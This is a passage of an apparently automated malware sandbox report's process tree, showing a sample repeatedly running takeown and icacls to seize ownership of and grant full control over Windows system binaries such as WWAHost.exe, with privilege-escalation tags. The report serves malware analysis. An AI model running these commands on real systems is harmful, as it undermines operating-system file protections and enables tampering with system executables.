  "C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\mstsc.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:824
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\SysWOW64\sdiagnhost.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2340
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\sdiagnhost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:1980
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  - Modifies file permissions
  PID:2588
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:2632
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  PID:2112
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Modifies file permissions
  PID:2644
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  - Modifies file permissions
  PID:2568
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Modifies file permissions
  PID:2700
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:1660
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2756
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Possible privilege escalation attempt
  PID:2692
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  - Possible privilege escalation attempt
  - Suspicious use of AdjustPrivilegeToken
  PID:2688
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  PID:1992
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Modifies file permissions
  PID:2312
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:2148
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2544
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  PID:2976
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:1924
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  - Modifies file permissions
  PID:2164
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Possible privilege escalation attempt
  PID:2792
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:268
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  PID:2732
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1056
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:564
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:2004
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Possible privilege escalation attempt
  PID:1996
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1720
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:760
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  - Modifies file permissions
  - Suspicious use of AdjustPrivilegeToken
  PID:1104
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:1444
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1360
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:2604
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  - Possible privilege escalation attempt
  - Suspicious use of AdjustPrivilegeToken
  PID:1268
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:532
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:784
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Possible privilege escalation attempt
  PID:3024
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1080
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:1908
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2752
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Modifies file permissions
  PID:2456
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  - Modifies file permissions
  - Suspicious use of AdjustPrivilegeToken
  PID:1044
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:2964
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  - Possible privilege escalation attempt
  - Suspicious use of AdjustPrivilegeToken
  PID:2240
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:2520
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1620
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:1456
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  - Possible privilege escalation attempt
  - Suspicious use of AdjustPrivilegeToken
  PID:1548
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Possible privilege escalation attempt
  PID:1532
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:908
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:2244
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2092
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Possible privilege escalation attempt
  PID:1752
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:556
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:2980
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1876
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:3060
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2640
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:1516
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2528
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Modifies file permissions
  PID:2236
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1568
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2328
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Possible privilege escalation attempt
  PID:1928
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:2372
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  - Suspicious use of AdjustPrivilegeToken
  PID:1736
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:572
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Modifies file permissions
  PID:1772
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Modifies file permissions
  PID:872
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:1452
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  - Possible privilege escalation attempt
  - Suspicious use of AdjustPrivilegeToken
  PID:2476
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  - Possible privilege escalation attempt
  PID:868
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:2712
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  PID:3044
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:1952
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:2416
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:924
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  - Modifies file permissions
  PID:308
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:1804
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:2320
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  PID:2788
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  - Modifies file permissions
  PID:840
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:828
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  PID:792
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:548
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  PID:2564
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:2252
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  - Possible privilege escalation attempt
  PID:2384
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:1864
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  - Possible privilege escalation attempt
  PID:1612
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  PID:3048
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Possible privilege escalation attempt
  PID:1988
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:2676
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  PID:2776
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Modifies file permissions
  PID:2356
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  PID:1092
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:2044
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  - Modifies file permissions
  PID:2924
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Possible privilege escalation attempt
  PID:1960
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  PID:1616
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:2660
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  PID:2108
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:2796
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  PID:1312
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:2016
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  PID:2944
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Modifies file permissions
  PID:1180
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  PID:3220
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:3240
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  - Modifies file permissions
  PID:3268
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:3276
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:3192
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  - Modifies file permissions
  PID:3296
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:3304
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  PID:3152
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  PID:3316
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Possible privilege escalation attempt
  PID:3332
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Modifies file permissions
  PID:3120
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  PID:3348
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  - Modifies file permissions
  PID:3088
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:3384
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  PID:3424
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Possible privilege escalation attempt
  PID:3440
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  PID:3464
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  - Modifies file permissions
  PID:3536
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Possible privilege escalation attempt
  PID:3496
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:3556
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  PID:3580
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Modifies file permissions
  PID:3604
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  PID:3612
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:3620
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  PID:3628
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:3648
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  - Possible privilege escalation attempt
  PID:3656
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  - Modifies file permissions
  PID:3664
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  PID:3672
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:3680
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  - Possible privilege escalation attempt
  PID:3692
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:3708
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  PID:3724
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:3736
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:3752
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:3768
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  PID:3776
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:3784
- C:\Windows\System32\takeown.exe
  "C:\Windows\System32\takeown.exe" /S PTZSFKIF /U Admin /F "C:\Windows\System32\WWAHost.exe"
  2⤵
  PID:3792
- C:\Windows\System32\icacls.exe
  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\WWAHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
  2⤵
  PID:3800
- C:\Windows\System32\takeown.exe
